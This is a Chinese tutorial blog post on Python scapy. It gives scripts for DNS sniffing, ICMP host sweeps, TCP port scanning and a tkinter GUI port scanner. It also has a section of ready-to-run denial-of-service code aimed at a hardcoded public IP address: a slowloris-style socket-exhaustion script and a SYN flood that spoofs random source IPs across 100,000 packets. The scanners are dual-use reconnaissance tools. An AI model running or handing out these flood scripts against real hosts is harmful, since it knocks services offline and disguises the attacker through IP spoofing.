当前位置:   article > 正文

Python scapy的简单使用_scapy.all

scapy.all

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

一、DNS监测简单脚本?

主要通过抓取端口53以及dns的包,通过数据包的qname和rrname判断是否存在某个域名的解析

  1. from scapy.all import *
  2. from scapy.layers.dns import DNSQR, DNSRR, DNS
  3. from scapy.layers.inet import IP
  4. import time
  5. def dns_sniff(packge):
  6. if 'baidu.com' in str(packge[DNSQR].qname) and DNSRR not in packge:
  7. print(time.strftime("%H:%M:%S", time.localtime()))
  8. print("解析url: %s 从ip %s 向%s域名服务器发送请求" % (
  9. str(packge[DNSQR].qname[:-1]).strip('b'), packge[IP].src, packge[IP].dst))
  10. if DNSRR in packge and packge.sport == 53 and DNSQR in packge:
  11. if 'baidu.com' in str(packge[DNSRR].rrname):
  12. print("解析url: %s 从域名服务器 %s 向%s发送回应" % (
  13. str(packge[DNSQR].qname[:-1]).strip('b'), packge[IP].src, packge[IP].dst))
  14. for i in range(packge[DNS].ancount):
  15. dnsrr = packge[DNS].an[i]
  16. print("域名服务器将url: %s 解析为 %s" % (
  17. str(dnsrr.rrname[:-1]).strip('b'), str(dnsrr.rdata).strip('b')))
  18. def main():
  19. packge = sniff(filter='udp and port 53', prn=dns_sniff)
  20. if __name__ == '__main__':
  21. main()

二、模拟Dos攻击和拒绝服务攻击

伪造源ip地址和随机端口往某服务器发TCP的包,使服务器进入等待状态,包足够多,服务器无法接受正常流量

  1. import time
  2. import threading
  3. import requests
  4. import socket
  5. url = "http://120.79.29.170"
  6. data = ("GET /HTTP/1.0\r\n"
  7. "Host: 120.79.29.170\r\n"
  8. "Content-Length: 10000000\r\n"
  9. "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0\r\n"
  10. )
  11. sockets = []
  12. def request_thread():
  13. for i in range(1, 10000):
  14. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  15. try:
  16. s.connect(('120.79.29.170', 80))
  17. s.send(data.encode())
  18. print(f"dos攻击第{i}\n")
  19. sockets.append(s)
  20. except Exception as ex:
  21. print(f"Couldn't connect 120.79.29.170{ex}")
  22. time.sleep(10)
  23. def send_thread():
  24. global sockets
  25. while True:
  26. for s in sockets:
  27. try:
  28. s.send("f".encode())
  29. except Exception as ex:
  30. print(f"Send Exception:%s\n{ex}")
  31. sockets.remove(s)
  32. s.close()
  33. time.sleep(1)
  34. start = threading.Thread(target=request_thread, args=())
  35. send = threading.Thread(target=send_thread, args=())
  36. start.start()
  37. send.start()

  1. from scapy.all import *
  2. import random
  3. from scapy.layers.inet import IP, TCP
  4. from scapy.layers.l2 import Ether
  5. def dos():
  6. for i in range(1, 100000):
  7. random_ip = str(random.randint(120, 150)) + "." + str(random.randint(1, 254)) + "." + str(
  8. random.randint(1, 254)) + "." + str(random.randint(1, 254))
  9. seq_number = random.randint(1, 65535 * 65535)
  10. ack_number = random.randint(1, 65535 * 65535)
  11. random_sport = random.randrange(20000, 65535, 1)
  12. payload = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
  13. data = IP(src=random_ip, dst="120.79.29.170") / TCP(
  14. sport=random_sport, dport=80, flags="S", window=8192, seq=seq_number, ack=ack_number) / payload
  15. send(data, verbose=False)
  16. if __name__ == '__main__':
  17. start = threading.Thread(target=dos(), args=())
  18. start.start()

三、主机扫描

通过向ip段发IP和ICMP的包,通过是否有回应包判断主机是否存活

  1. from scapy.all import *
  2. from scapy.layers.inet import TCP, IP, ICMP
  3. def icmp_scan(startip, endip, number):
  4. for i in range(0, number + 1):
  5. ipend = startip.split('.')[3]
  6. last = int(ipend) + int(i)
  7. ip = startip.split('.')[0] + '.' + startip.split('.')[1] + '.' + startip.split('.')[2] + '.' + str(last)
  8. p = IP(dst=ip) / ICMP()
  9. ans = sr1(p, timeout=3, verbose=0)
  10. if ans is not None:
  11. print(str(ip) + "主机存活")
  12. else:
  13. print(str(ip) + "主机不存活")
  14. if __name__ == '__main__':
  15. sip = input("起始扫描的网段ip:")
  16. eip = input("终止扫描的网段ip:")
  17. s = sip.split('.')[3]
  18. e = eip.split('.')[3]
  19. num = int(e) - int(s)
  20. start = threading.Thread(target=icmp_scan, args=(sip, eip, num))
  21. start.start()

四、端口扫描

通过向某ip的端口发送IP/TCP的数据包,接受回应的数据,判断数据包中是否存在关键字‘SA'判断是否存活

  1. from scapy.all import *
  2. from scapy.layers.inet import TCP, IP
  3. import re
  4. conf.verb = 0
  5. def portscan(ip, lport, hport):
  6. for i in range(int(lport), int(hport)):
  7. data = IP(dst=ip) / TCP(dport=i)
  8. ans, unans = sr(data, timeout=3)
  9. if ans:
  10. res = str(ans[0])
  11. if re.findall("SA", res):
  12. print(str(i) + "存活")
  13. else:
  14. print(str(i) + "不存活")
  15. else:
  16. print(str(i) + "不存活")
  17. if __name__ == '__main__':
  18. ip = input("输入要扫描的ip地址:")
  19. lport = input("要扫描的起始端口:")
  20. hport = input("要扫描的结束端口")
  21. start = threading.Thread(target=portscan, args=(ip, lport, hport))
  22. start.start()

五、GUI端口扫描

可以做一个工具,存在GUI页面,然后对端口开放进行扫描。原理可以通过python发送TCP包,判断回报的flags是否等于18判断端口是否存活,然后根据回包情况判断四种情况,不存活,被过滤,不接受TCP连接,然后根据端口号的情况判断一些常见的服务,最后融入多线程服务完成简单的GUI工具制造。

  1. import queue
  2. import tkinter as tk
  3. import tkinter.messagebox
  4. from tkinter import StringVar, END, RIGHT, Y
  5. import pandas as pd
  6. from scapy.all import *
  7. from scapy.layers.inet import TCP, IP, ICMP
  8. from tkinter.filedialog import *
  9. import socket
  10. port_list = []
  11. nThread = 10
  12. lock = threading.Lock()
  13. service_for_port = {}
  14. def xlsx_service():
  15. df = pd.read_excel("服务类型.xlsx")
  16. row = df.shape[0]
  17. for i in range(row):
  18. service_for_port[df.values[i, 0]] = df.values[i, 1]
  19. def GetQueue(list):
  20. PortQueue = queue.Queue(65535)
  21. for p in list:
  22. PortQueue.put(p) # 将端口添加进队列中
  23. return PortQueue
  24. class Scan(object):
  25. def __init__(self):
  26. self.ip_list = []
  27. self.TrueIp = None
  28. self.flag = None
  29. self.window = tk.Tk()
  30. self.window.title('娜涵谊颖WinTeam-端口扫描')
  31. self.window.geometry("500x500")
  32. self.Ping_dict_ip = dict()
  33. tk.Label(self.window, text='IP:').place(x=10, y=90, anchor='nw')
  34. self.ip = tk.Entry(self.window)
  35. tk.Button(self.window, text="批量导入", width=8, command=self.file).place(x=175, y=90, anchor='nw')
  36. tk.Label(self.window, text='端口:').place(x=10, y=130, anchor='nw')
  37. sport = StringVar()
  38. sport.set("格式:1-65535/22,80")
  39. self.sport = tk.Entry(self.window, textvariable=sport)
  40. tk.Button(self.window, text='扫描', width=5, command=self.scan).place(x=20, y=310, anchor='nw')
  41. tk.Button(self.window, text='退出', width=5, command=self.exit).place(x=90, y=310, anchor='nw')
  42. tk.Button(self.window, text='清空', width=5, command=self.clear).place(x=160, y=310, anchor='nw')
  43. tk.Button(self.window, text='导出', width=5, command=self.out).place(x=220, y=310, anchor='nw')
  44. self.text1 = tk.Text(self.window, height=20, width=30)
  45. self.yscrollbar = tk.Scrollbar(self.window)
  46. tk.Label(self.window, text='扫描结果:').place(x=250, y=20, anchor='nw')
  47. self.yscrollbar.config(command=self.text1.yview)
  48. self.text1.config(yscrollcommand=self.yscrollbar.set)
  49. def layout(self):
  50. self.ip.place(x=50, y=92, anchor='nw')
  51. self.sport.place(x=70, y=130, anchor='nw')
  52. self.text1.place(x=255, y=50, anchor='nw', width='230')
  53. self.yscrollbar.pack(side=RIGHT, fill=Y)
  54. def file(self):
  55. filepath = askopenfilename()
  56. print(filepath)
  57. lines = open(filepath, 'r').readlines()
  58. for line in lines:
  59. self.ip_list.append(line.strip('\n'))
  60. self.flag = 1
  61. def getvalue(self):
  62. try:
  63. sport = str(self.sport.get())
  64. except:
  65. tk.messagebox.showerror(title='错误', message='端口参数不能为空!')
  66. return
  67. if sport.find('-') > 0:
  68. port_Tmp = sport.split('-')
  69. if not port_Tmp[0].isdigit() and port_Tmp[1].isdigit():
  70. tk.messagebox.showerror(title='错误', message="端口必须是数字!")
  71. return
  72. for port in range(int(port_Tmp[0]), int(port_Tmp[1]) + 1):
  73. port_list.append(port)
  74. elif sport.find(','):
  75. port_Tmp = sport.split(',')
  76. for port in port_Tmp:
  77. if not port.isdigit():
  78. tk.messagebox.showerror(title='错误', message="端口必须是数字!")
  79. return
  80. port_list.append(int(port))
  81. else:
  82. tk.messagebox.showerror(title='错误', message="端口输入格式有误!")
  83. return
  84. def scan(self):
  85. global port_list
  86. self.text1.delete(0.0, 'end')
  87. self.getvalue()
  88. SingleQueue = GetQueue(port_list)
  89. self.text1.insert(END, "*******开始扫描********\n" + '\n\n')
  90. if self.flag == 1:
  91. self.ip.insert(END, "继续扫描点击清空按钮")
  92. for ip in self.ip_list:
  93. if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", ip):
  94. self.TrueIp = ip
  95. result = self.ping_scan(self.TrueIp)
  96. self.Ping_dict_ip[self.TrueIp] = result
  97. else:
  98. tk.messagebox.showerror(title='错误', message="IP输入格式有误")
  99. return
  100. # self.MyThread(self.IpMultiThread, self.TrueIp, port_list)
  101. start = threading.Thread(target=self.IpMultiThread, args=(ip, port_list))
  102. start.start()
  103. else:
  104. if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", self.ip.get()):
  105. self.TrueIp = self.ip.get()
  106. else:
  107. tk.messagebox.showerror(title='错误', message="IP输入格式有误")
  108. return
  109. result = self.ping_scan(self.TrueIp)
  110. self.Ping_dict_ip[self.TrueIp] = result
  111. for i in range(nThread):
  112. self.MyThread(self.SingleThread, self.TrueIp, SingleQueue)
  113. def ping_scan(self, ip):
  114. p = IP(dst=ip) / ICMP()
  115. ans = sr1(p, timeout=3, verbose=0)
  116. if ans is not None:
  117. return 1
  118. else:
  119. return 0
  120. def tcp_scan(self, ip, port):
  121. if lock.acquire():
  122. try:
  123. data = IP(dst=ip) / TCP(dport=port, flags="S")
  124. result = sr1(data, timeout=0.5, verbose=0)
  125. if int(result[TCP].flags) == 18: # SYN+ACK=AC
  126. try:
  127. service = socket.getservbyport(port)
  128. except:
  129. if port in service_for_port.keys():
  130. service = service_for_port[port]
  131. else:
  132. service = "暂时未知"
  133. self.text1.insert(END, f"{ip},端口{port}存活,服务可能:{service}\n\n")
  134. lock.release()
  135. else:
  136. self.text1.insert(END, f"{ip},端口{port}不存活\n\n")
  137. lock.release()
  138. except:
  139. if self.Ping_dict_ip.get(ip) == 0:
  140. self.text1.insert(END, f"主机{ip}不存活\n\n")
  141. else:
  142. self.text1.insert(END, f"主机{ip},端口{port}不接受TCP连接\n\n")
  143. lock.release()
  144. def SingleThread(self, ip, SingleQueue):
  145. while not SingleQueue.empty():
  146. p = SingleQueue.get()
  147. self.tcp_scan(ip, p)
  148. def IpMultiThread(self, ip, PortList):
  149. for p in PortList:
  150. self.tcp_scan(ip, p)
  151. def exit(self):
  152. result = tk.messagebox.askquestion(title='退出', message='确定退出吗?')
  153. if result == 'yes':
  154. sys.exit(0)
  155. def out(self):
  156. f = open('./result.txt', 'a', encoding='utf-8')
  157. f.write(self.text1.get("1.0", "end"))
  158. def clear(self):
  159. self.ip.delete(0, 'end')
  160. self.sport.delete(0, 'end')
  161. self.text1.delete(0.0, 'end')
  162. self.flag = None
  163. self.Ping_dict_ip.clear()
  164. port_list.clear()
  165. class MyThread(threading.Thread):
  166. def __init__(self, func, ip, *args):
  167. super().__init__()
  168. # self._stop_event = threading.Event()
  169. self.func = func
  170. self.args = args
  171. self.ip = ip
  172. self.setDaemon(True) # 通过setDaemon(true)来设置线程为“守护线程”;将一个用户线程设置为守护线程的方式是在 线程对象创建 之前 用线程对象的setDaemon方法。
  173. self.start()
  174. def run(self):
  175. self.func(self.ip, *self.args)
  176. if __name__ == '__main__':
  177. xlsx_service()
  178. scanner = Scan()
  179. scanner.layout()
  180. scanner.window.mainloop()

 

 

 然后可以进行导出结果和导入url文本连接的功能。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/157011
推荐阅读
相关标签
  

闽ICP备14008679号